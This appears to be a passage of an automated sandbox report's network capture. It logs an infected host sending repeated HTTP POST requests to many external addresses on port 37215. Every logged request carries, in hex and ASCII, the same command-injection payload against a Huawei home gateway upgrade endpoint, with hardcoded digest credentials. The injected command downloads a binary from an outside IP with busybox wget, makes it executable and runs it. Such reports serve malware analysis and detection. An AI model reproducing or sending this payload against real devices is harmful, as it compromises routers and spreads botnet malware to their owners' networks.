2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      6192.168.2.1434268156.75.20.18437215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.610935926 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      7192.168.2.145435841.28.6.11937215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.612128973 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.298183918 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.098084927 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      8192.168.2.1454260156.144.125.7837215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.613384008 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.032757998 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      9192.168.2.1441528197.88.167.11137215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.614531040 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.234163046 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                      10192.168.2.1447190197.63.66.13437215
                                                                      TimestampBytes transferredDirectionData
                                                                      Aug 2, 2024 13:17:03.615606070 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:04.266160011 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 35 2e 31 39 30 2e 32 33 30 2e 32 32 39 20 2d 6c 20 2f 74 6d 70 2f 6b 69 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 69 3b 20 2f 74 6d 70 2f 6b 69 [TRUNCATED]
                                                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 85.190.230.229 -l /tmp/ki -r /hmips; /bin/busybox chmod 777 * /tmp/ki; /tmp/ki huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                                      Aug 2, 2024 13:17:05.034095049 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                      Content-Length: 430
                                                                      Connection: keep-alive
                                                                      Accept: */*
                                                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
